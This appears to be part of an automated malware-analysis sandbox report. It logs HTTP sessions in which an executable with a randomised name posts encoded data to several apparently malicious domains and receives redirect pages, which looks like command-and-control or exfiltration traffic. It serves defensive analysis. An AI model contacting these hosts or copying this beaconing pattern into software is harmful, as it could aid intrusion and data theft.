                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 68 2d 70 3d 5a 44 72 79 66 6a 61 4c 48 77 42 6e 55 71 55 41 7a 37 68 70 41 32 2f 68 47 50 39 65 42 7a 63 66 61 59 30 76 69 47 44 71 75 4b 6e 4c 63 54 6c 41 6b 6d 59 75 6b 2f 36 4d 31 4f 41 38 31 61 69 79 2b 4b 47 68 42 4e 51 2b 64 5a 4c 32 6d 59 4f 46 64 53 6a 48 56 45 6b 4c 49 57 34 74 36 4b 71 79 6b 69 50 4d 4a 41 43 32 61 4f 47 75 6f 38 6a 37 67 76 4f 2b 78 59 49 37 36 32 2f 46 5a 78 53 50 6a 53 45 31 36 61 79 57 65 65 63 33 26 79 50 3d 4d 78 58 48 64 6c 7a 70 51 72 64 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3h-p=ZDryfjaLHwBnUqUAz7hpA2/hGP9eBzcfaY0viGDquKnLcTlAkmYuk/6M1OA81aiy+KGhBNQ+dZL2mYOFdSjHVEkLIW4t6KqykiPMJAC2aOGuo8j7gvO+xYI762/FZxSPjSE16ayWeec3&yP=MxXHdlzpQrd0"}</script></head></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        13192.168.2.7549653.33.130.190802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:36:17.057209015 CEST738OUTPOST /05bk/ HTTP/1.1
                                        Host: www.softillery.info
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.softillery.info
                                        Content-Length: 217
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.softillery.info/05bk/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 32 75 4e 4b 35 66 4e 62 52 67 78 73 4c 7a 46 79 38 52 44 6f 46 77 4d 6e 38 57 63 66 75 32 63 61 44 54 63 44 44 69 43 4b 58 68 33 50 46 53 36 2b 43 72 5a 31 32 37 49 57 44 56 53 50 59 50 50 35 70 70 54 5a 38 56 4a 68 63 55 4b 34 57 38 45 53 6f 62 6f 50 6b 6e 58 43 55 6d 45 4e 4f 75 42 55 76 69 62 39 4d 61 41 6c 62 33 64 4a 47 71 55 32 7a 62 6c 56 73 68 6e 53 55 4a 64 62 53 79 64 78 44 2b 54 4a 57 4d 77 7a 58 49 33 35 4a 35 4f 72 37 51 68 66 39 6e 75 77 34 71 33 53 52 34 4d 45 34 4a 32 33 76 4b 6c 54 4f 46 45 6f 62 6a 68 7a 71 7a 49 2b 54 31 51 49 42 73 77 71 49 48 49 76 31 75 37 4f 77 66 5a 4e 4e 2f 4a 53 66 6e 51 6e 56 51 3d 3d
                                        Data Ascii: 3h-p=2uNK5fNbRgxsLzFy8RDoFwMn8Wcfu2caDTcDDiCKXh3PFS6+CrZ127IWDVSPYPP5ppTZ8VJhcUK4W8ESoboPknXCUmENOuBUvib9MaAlb3dJGqU2zblVshnSUJdbSydxD+TJWMwzXI35J5Or7Qhf9nuw4q3SR4ME4J23vKlTOFEobjhzqzI+T1QIBswqIHIv1u7OwfZNN/JSfnQnVQ==


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        14192.168.2.7549663.33.130.190802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:36:19.599750042 CEST758OUTPOST /05bk/ HTTP/1.1
                                        Host: www.softillery.info
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.softillery.info
                                        Content-Length: 237
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.softillery.info/05bk/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 32 75 4e 4b 35 66 4e 62 52 67 78 73 4b 54 31 79 2f 79 37 6f 56 67 4d 6f 67 47 63 66 6b 57 64 52 44 54 41 44 44 6e 69 61 58 54 6a 50 45 77 79 2b 44 75 74 31 31 37 49 57 4c 31 53 77 57 76 50 49 70 70 65 35 38 56 46 68 63 55 65 34 57 2b 63 53 6f 6f 77 4f 6b 33 58 41 42 57 45 54 4e 65 42 55 76 69 62 39 4d 5a 38 4c 62 7a 4a 4a 47 61 6b 32 7a 35 4e 55 67 42 6e 64 54 4a 64 62 57 79 64 31 44 2b 54 76 57 49 51 5a 58 4b 2f 35 4a 37 57 72 37 42 68 63 6b 58 75 71 79 4b 33 46 56 74 31 7a 68 4d 48 50 71 72 68 4c 41 56 45 32 65 56 38 52 77 52 45 53 4e 6b 6f 7a 46 75 55 63 66 68 56 61 33 76 2f 57 39 39 74 73 53 49 73 34 53 31 78 6a 44 69 31 59 75 75 68 4a 58 59 74 51 43 31 36 39 6a 48 76 4f 75 36 6f 3d
                                        Data Ascii: 3h-p=2uNK5fNbRgxsKT1y/y7oVgMogGcfkWdRDTADDniaXTjPEwy+Dut117IWL1SwWvPIppe58VFhcUe4W+cSoowOk3XABWETNeBUvib9MZ8LbzJJGak2z5NUgBndTJdbWyd1D+TvWIQZXK/5J7Wr7BhckXuqyK3FVt1zhMHPqrhLAVE2eV8RwRESNkozFuUcfhVa3v/W99tsSIs4S1xjDi1YuuhJXYtQC169jHvOu6o=


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        15192.168.2.7549673.33.130.190802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:36:22.174774885 CEST1771OUTPOST /05bk/ HTTP/1.1
                                        Host: www.softillery.info
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.softillery.info
                                        Content-Length: 1249
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.softillery.info/05bk/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 32 75 4e 4b 35 66 4e 62 52 67 78 73 4b 54 31 79 2f 79 37 6f 56 67 4d 6f 67 47 63 66 6b 57 64 52 44 54 41 44 44 6e 69 61 58 54 37 50 45 43 4b 2b 43 4a 42 31 30 37 49 57 42 56 53 31 57 76 50 56 70 70 57 31 38 56 5a 78 63 58 6d 34 5a 37 49 53 67 35 77 4f 78 48 58 41 65 47 45 4f 4f 75 42 46 76 6d 32 36 4d 61 45 4c 62 7a 4a 4a 47 63 67 32 78 72 6c 55 6d 42 6e 53 55 4a 64 58 53 79 63 69 44 2b 4b 61 57 4a 51 6a 57 36 66 35 4a 62 47 72 32 54 5a 63 37 6e 75 73 31 4b 32 41 56 74 78 73 68 49 6d 32 71 72 46 78 41 53 49 32 66 68 31 6e 73 46 45 64 55 31 73 47 4b 50 6b 59 58 51 78 48 79 65 54 36 39 66 41 4c 4f 76 59 62 5a 53 35 39 42 6c 4a 46 78 2f 39 36 57 73 52 45 49 79 76 4e 6e 56 4b 4d 32 64 31 5a 64 58 6e 67 4b 75 55 7a 57 2f 5a 6c 31 44 58 63 76 36 72 56 6c 6e 43 39 55 45 63 42 64 4d 39 4c 65 66 79 4e 4c 4f 35 45 30 75 46 57 77 59 32 39 78 47 4f 59 43 57 52 73 76 2f 57 6a 50 47 78 73 47 57 35 6b 48 65 2f 4f 48 71 68 4f 46 42 33 4f 47 4d 43 75 4c 2b 30 56 46 58 52 67 6b 38 35 70 49 46 39 52 53 [TRUNCATED]
                                        Data Ascii: 3h-p=2uNK5fNbRgxsKT1y/y7oVgMogGcfkWdRDTADDniaXT7PECK+CJB107IWBVS1WvPVppW18VZxcXm4Z7ISg5wOxHXAeGEOOuBFvm26MaELbzJJGcg2xrlUmBnSUJdXSyciD+KaWJQjW6f5JbGr2TZc7nus1K2AVtxshIm2qrFxASI2fh1nsFEdU1sGKPkYXQxHyeT69fALOvYbZS59BlJFx/96WsREIyvNnVKM2d1ZdXngKuUzW/Zl1DXcv6rVlnC9UEcBdM9LefyNLO5E0uFWwY29xGOYCWRsv/WjPGxsGW5kHe/OHqhOFB3OGMCuL+0VFXRgk85pIF9RS8nHoz681mZdt8ZEJT3HeuPv+CUPo5svPBLJDi7NYh95WiSVKQEhSlzSP37WM1ETyemEp8GLfUn3i+44TGQgvX8qbXuGa624zaR1m8W9876L9/1jmNhcEzLVlhwwUp+A3i28x/Xxan/pJidWF13hBvfYBEoTZL3uwwODLzVyoUyvEolPrjbu/ahg2TPlFpnig1xzo4J4eMywiAz/NWhLqiI0PJUSMOQW3Dr7O4JCvqfEqXlHztgMWimJBmQDL1PHVofXUb95NiS7E/ThRfh0iHTD7ZOXXIQtqXn9BRu09QJF2CR+8C52W23lqHSW8nb1JGxDnIdOsutbROtFWy8KQ+Ru2LVSGO8QXdumwvnEUbejyATR9Sp8j+gEbSArW17FeCtnKJq3jLEgbv8mpvho0+R+a9XQn8X9hscUWYPJicEJLzCpNxBy0hwsEqwDdoeN7gw4X2HJjy1QcGPSeTyWQOVS6v7a0G7egE+etI5hxVUqM9aeeXAXxp2XJqfWWrWFutKOyZj2Eq3airG5Ss/0rDCtRGKyKD1a6v0YB7Yu2/Wey7cy+xCgINhry836P8/nCbNi02GMjIuNKAvZtjoyhfNimxvvEYNpcHdpTo8wqiQ5ta9UYTgw9udQhTrSuGb9b/mmAa9EA5uS5tOpgAULAVlQmgVYNmATrQ+ [TRUNCATED]


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        16192.168.2.7549683.33.130.190802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:36:24.737642050 CEST472OUTGET /05bk/?3h-p=7slq6roGbUYIGCZK/AHLAj192Fgd/VphPEARDFaBZgyILhyhf/dU1Jg1HH64YML39LGaxm9NI1GZWNYUnLUXyXLdbmUNBKZzgEadXvwwUw5uXrkOz5o90nGwS6h8GF9GBt2NTtUZfNeM&yP=MxXHdlzpQrd0 HTTP/1.1
                                        Host: www.softillery.info
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-us
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Sep 27, 2024 06:36:25.188066959 CEST416INHTTP/1.1 200 OK
                                        Server: openresty
                                        Date: Fri, 27 Sep 2024 04:36:25 GMT
                                        Content-Type: text/html
                                        Content-Length: 276
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 68 2d 70 3d 37 73 6c 71 36 72 6f 47 62 55 59 49 47 43 5a 4b 2f 41 48 4c 41 6a 31 39 32 46 67 64 2f 56 70 68 50 45 41 52 44 46 61 42 5a 67 79 49 4c 68 79 68 66 2f 64 55 31 4a 67 31 48 48 36 34 59 4d 4c 33 39 4c 47 61 78 6d 39 4e 49 31 47 5a 57 4e 59 55 6e 4c 55 58 79 58 4c 64 62 6d 55 4e 42 4b 5a 7a 67 45 61 64 58 76 77 77 55 77 35 75 58 72 6b 4f 7a 35 6f 39 30 6e 47 77 53 36 68 38 47 46 39 47 42 74 32 4e 54 74 55 5a 66 4e 65 4d 26 79 50 3d 4d 78 58 48 64 6c 7a 70 51 72 64 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3h-p=7slq6roGbUYIGCZK/AHLAj192Fgd/VphPEARDFaBZgyILhyhf/dU1Jg1HH64YML39LGaxm9NI1GZWNYUnLUXyXLdbmUNBKZzgEadXvwwUw5uXrkOz5o90nGwS6h8GF9GBt2NTtUZfNeM&yP=MxXHdlzpQrd0"}</script></head></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        17192.168.2.7549693.33.130.190802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:36:30.289741993 CEST750OUTPOST /43nw/ HTTP/1.1
                                        Host: www.asiapartnars.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.asiapartnars.online
                                        Content-Length: 217
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.asiapartnars.online/43nw/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 65 54 44 51 75 43 33 47 31 6f 75 63 39 6b 66 6a 32 52 46 7a 46 63 66 4b 7a 74 76 4a 4f 50 62 42 74 6f 2b 41 6f 55 7a 6b 74 39 34 54 7a 54 37 66 6b 2b 2f 5a 33 54 65 4b 4d 62 54 4a 52 58 53 44 68 4b 35 41 31 2b 45 72 39 78 30 69 55 4e 4a 6e 37 62 6f 72 54 41 53 4c 55 68 51 62 38 55 45 50 44 67 4e 5a 63 71 68 44 47 30 7a 77 32 6a 59 55 54 51 72 45 32 67 2b 4c 6a 6b 4a 73 53 4b 68 77 4d 49 56 35 54 31 49 36 71 63 43 59 76 6a 38 5a 37 48 52 39 42 39 6c 78 4c 75 58 61 39 74 34 79 41 61 72 62 55 4d 7a 2f 4e 66 72 39 2f 48 46 53 63 42 54 48 64 5a 49 57 48 63 6b 65 2b 2b 37 75 47 33 48 38 4c 59 47 57 4f 62 75 75 4b 7a 78 70 6e 77 3d 3d
                                        Data Ascii: 3h-p=eTDQuC3G1ouc9kfj2RFzFcfKztvJOPbBto+AoUzkt94TzT7fk+/Z3TeKMbTJRXSDhK5A1+Er9x0iUNJn7borTASLUhQb8UEPDgNZcqhDG0zw2jYUTQrE2g+LjkJsSKhwMIV5T1I6qcCYvj8Z7HR9B9lxLuXa9t4yAarbUMz/Nfr9/HFScBTHdZIWHcke++7uG3H8LYGWObuuKzxpnw==


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        18192.168.2.7549703.33.130.190802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:36:32.842016935 CEST770OUTPOST /43nw/ HTTP/1.1
                                        Host: www.asiapartnars.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.asiapartnars.online
                                        Content-Length: 237
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.asiapartnars.online/43nw/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 65 54 44 51 75 43 33 47 31 6f 75 63 38 46 76 6a 6c 77 46 7a 4d 63 66 4a 76 39 76 4a 48 76 62 64 74 6f 69 41 6f 52 54 4b 73 50 63 54 79 78 6a 66 6c 38 62 5a 32 54 65 4b 48 37 54 4d 63 33 53 55 68 4b 31 49 31 37 38 72 39 78 67 69 55 4a 4e 6e 37 71 6f 30 53 51 53 46 49 68 51 64 34 55 45 50 44 67 4e 5a 63 71 63 6d 47 31 58 77 32 7a 6f 55 42 6b 66 4c 71 77 2b 49 7a 30 4a 73 46 61 68 30 4d 49 56 4c 54 30 46 52 71 61 47 59 76 69 4d 5a 37 57 52 2b 4c 39 6b 30 46 4f 57 36 32 34 64 65 50 62 7a 42 57 75 76 58 49 73 72 4b 33 52 59 77 47 6a 66 72 44 49 77 74 44 65 41 6f 70 59 6d 62 45 32 44 6b 47 36 79 33 52 73 4c 45 48 68 51 74 78 46 61 6b 75 4d 38 65 31 59 63 4f 72 6c 7a 66 54 78 68 68 50 49 59 3d
                                        Data Ascii: 3h-p=eTDQuC3G1ouc8FvjlwFzMcfJv9vJHvbdtoiAoRTKsPcTyxjfl8bZ2TeKH7TMc3SUhK1I178r9xgiUJNn7qo0SQSFIhQd4UEPDgNZcqcmG1Xw2zoUBkfLqw+Iz0JsFah0MIVLT0FRqaGYviMZ7WR+L9k0FOW624dePbzBWuvXIsrK3RYwGjfrDIwtDeAopYmbE2DkG6y3RsLEHhQtxFakuM8e1YcOrlzfTxhhPIY=


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        19192.168.2.7549713.33.130.190802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:36:35.396697998 CEST1783OUTPOST /43nw/ HTTP/1.1
                                        Host: www.asiapartnars.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.asiapartnars.online
                                        Content-Length: 1249
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.asiapartnars.online/43nw/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 65 54 44 51 75 43 33 47 31 6f 75 63 38 46 76 6a 6c 77 46 7a 4d 63 66 4a 76 39 76 4a 48 76 62 64 74 6f 69 41 6f 52 54 4b 73 50 55 54 79 43 72 66 6b 63 6e 5a 31 54 65 4b 62 72 54 4e 63 33 54 57 68 4b 74 4d 31 37 34 42 39 79 59 69 55 73 5a 6e 39 59 4d 30 62 51 53 46 44 42 51 59 38 55 45 67 44 67 64 64 63 75 38 6d 47 31 58 77 32 31 4d 55 44 77 72 4c 36 41 2b 4c 6a 6b 4a 6f 53 4b 68 63 4d 49 64 78 54 30 41 71 71 71 6d 59 76 43 63 5a 35 6b 4a 2b 44 39 6b 36 47 4f 57 59 32 34 5a 42 50 66 54 72 57 76 4c 35 49 75 37 4b 6e 48 4a 7a 5a 54 65 78 43 59 34 34 41 64 6b 4c 67 35 4f 75 65 57 50 6f 50 34 79 49 63 2b 7a 75 50 54 6f 51 77 68 58 56 7a 66 4a 74 36 4b 30 34 71 67 43 46 4b 44 64 36 56 66 41 6c 48 6c 5a 41 38 42 35 6b 54 74 4c 6f 65 55 74 63 74 2b 33 35 4d 66 77 35 50 57 4c 6a 79 6e 54 67 4d 4e 50 47 4d 5a 78 74 4a 69 66 69 31 52 41 56 6b 4d 34 42 42 72 6e 57 30 64 4f 31 32 70 56 56 71 64 4d 33 6d 41 6b 77 5a 6f 43 4f 39 6d 57 63 7a 4a 71 44 69 6e 33 70 44 47 6c 72 32 33 74 34 50 50 37 54 75 [TRUNCATED]
                                        Data Ascii: 3h-p=eTDQuC3G1ouc8FvjlwFzMcfJv9vJHvbdtoiAoRTKsPUTyCrfkcnZ1TeKbrTNc3TWhKtM174B9yYiUsZn9YM0bQSFDBQY8UEgDgddcu8mG1Xw21MUDwrL6A+LjkJoSKhcMIdxT0AqqqmYvCcZ5kJ+D9k6GOWY24ZBPfTrWvL5Iu7KnHJzZTexCY44AdkLg5OueWPoP4yIc+zuPToQwhXVzfJt6K04qgCFKDd6VfAlHlZA8B5kTtLoeUtct+35Mfw5PWLjynTgMNPGMZxtJifi1RAVkM4BBrnW0dO12pVVqdM3mAkwZoCO9mWczJqDin3pDGlr23t4PP7TuhVhmFeymoHS3I7y8Wrd5SSJzSuyxX49ULA0r2tKstQb/N+o0we958c1WsR/kMXj290Ww98P3cBu8p6jP69nlUNFaXRm1bdUa742AeGNwyIpZNcYPpIMo9c7U1Ht+g2N2TATot8S2W9CvH7aAiNuK/3G1hrL2x1mUYpJ0Jh90hsC0tq9CtpFHJqtaINPmF5IRs5HFIAooiy21CeuUF2fyOGbCzdQzqvFyaAN8eDs0MxniuvsedK+npboUgFS9DAB4ml7FtPKoEGuczOtuMhJSYEztnKsCcPgq9/l3nln9UkUcLWp099NMU7XHIFjnZmjZQQ4b9fefSFLH5ygctiDMYpRJdqIGB05aJZu3uTSXipSBRX90k+5Wi3BxnIsjWBPwfWvh6/PMcYSYZ38KjS0YAty1HoZlbr1Cv9jFKOb8xjEs77EazQkzFrcvEVdXmh7PdpBwB6B5RDx+lc0jQXwp3tGBkSivGbuloST4po0DqivKHRWkN/M52vC7GogXC8+aSBqBsAjtq//kboPgwJSbfE1v5TOwaa9bYZMelCFl7T8WTqdE7cWDzGKnxidLA58Yl/jR//3q9ib5+2yqsZc5V3KIAglaA5DMwmaxm0fE/qxeui3fCOT33unmx3FYoNMr2/TjYM662dIa7sfsGHFts8LVA7SLTjtfqG [TRUNCATED]


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        20192.168.2.7549723.33.130.190802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:36:37.969007015 CEST476OUTGET /43nw/?yP=MxXHdlzpQrd0&3h-p=TRrwt1Lp84Si32vs8BwRNNCulMjKfdr7iMjgkGLejtYz7grWw7bT5zKsM4PORiqIxohG3+sDrwsXXfU947RLBQy8IxkH7FUKKiRlKageAzPI0SYRDznkpg/s6UBWT6V3P6UmeH8wgKTy HTTP/1.1
                                        Host: www.asiapartnars.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-us
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Sep 27, 2024 06:36:38.438513041 CEST416INHTTP/1.1 200 OK
                                        Server: openresty
                                        Date: Fri, 27 Sep 2024 04:36:38 GMT
                                        Content-Type: text/html
                                        Content-Length: 276
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 50 3d 4d 78 58 48 64 6c 7a 70 51 72 64 30 26 33 68 2d 70 3d 54 52 72 77 74 31 4c 70 38 34 53 69 33 32 76 73 38 42 77 52 4e 4e 43 75 6c 4d 6a 4b 66 64 72 37 69 4d 6a 67 6b 47 4c 65 6a 74 59 7a 37 67 72 57 77 37 62 54 35 7a 4b 73 4d 34 50 4f 52 69 71 49 78 6f 68 47 33 2b 73 44 72 77 73 58 58 66 55 39 34 37 52 4c 42 51 79 38 49 78 6b 48 37 46 55 4b 4b 69 52 6c 4b 61 67 65 41 7a 50 49 30 53 59 52 44 7a 6e 6b 70 67 2f 73 36 55 42 57 54 36 56 33 50 36 55 6d 65 48 38 77 67 4b 54 79 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?yP=MxXHdlzpQrd0&3h-p=TRrwt1Lp84Si32vs8BwRNNCulMjKfdr7iMjgkGLejtYz7grWw7bT5zKsM4PORiqIxohG3+sDrwsXXfU947RLBQy8IxkH7FUKKiRlKageAzPI0SYRDznkpg/s6UBWT6V3P6UmeH8wgKTy"}</script></head></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        21192.168.2.754973162.0.238.238802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:36:43.500741959 CEST735OUTPOST /orig/ HTTP/1.1
                                        Host: www.priunit.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.priunit.online
                                        Content-Length: 217
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.priunit.online/orig/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 6d 2f 45 65 38 79 32 69 44 31 65 77 61 7a 62 5a 63 68 64 4f 69 47 64 2b 68 4d 48 6a 51 69 50 76 4a 34 57 42 2b 6d 41 79 4b 73 6c 6a 42 4c 74 75 50 30 74 33 62 61 49 37 43 31 32 54 34 52 43 5a 39 68 63 64 55 33 44 79 64 6e 71 59 77 6c 68 59 64 79 42 45 63 39 4a 65 2b 41 56 35 49 4a 33 6e 79 52 4b 45 5a 79 62 51 65 65 39 68 32 4f 72 2b 34 61 78 69 47 74 58 47 36 71 6e 2f 71 45 4c 41 4f 76 64 6c 67 79 6c 76 45 31 38 47 32 52 34 36 46 49 34 50 63 65 44 41 46 71 5a 4e 56 69 55 47 56 37 4b 54 79 2f 35 75 70 4f 4c 55 4e 70 2b 2b 77 42 50 59 5a 64 74 2b 41 46 4f 47 52 6a 65 6e 76 57 50 35 32 43 36 63 6d 44 39 64 5a 6e 57 62 6f 67 3d 3d
                                        Data Ascii: 3h-p=m/Ee8y2iD1ewazbZchdOiGd+hMHjQiPvJ4WB+mAyKsljBLtuP0t3baI7C12T4RCZ9hcdU3DydnqYwlhYdyBEc9Je+AV5IJ3nyRKEZybQee9h2Or+4axiGtXG6qn/qELAOvdlgylvE18G2R46FI4PceDAFqZNViUGV7KTy/5upOLUNp++wBPYZdt+AFOGRjenvWP52C6cmD9dZnWbog==
                                        Sep 27, 2024 06:36:44.078306913 CEST595INHTTP/1.1 404 Not Found
                                        Date: Fri, 27 Sep 2024 04:36:43 GMT
                                        Server: Apache
                                        X-Frame-Options: SAMEORIGIN
                                        Content-Length: 389
                                        X-XSS-Protection: 1; mode=block
                                        Connection: close
                                        Content-Type: text/html
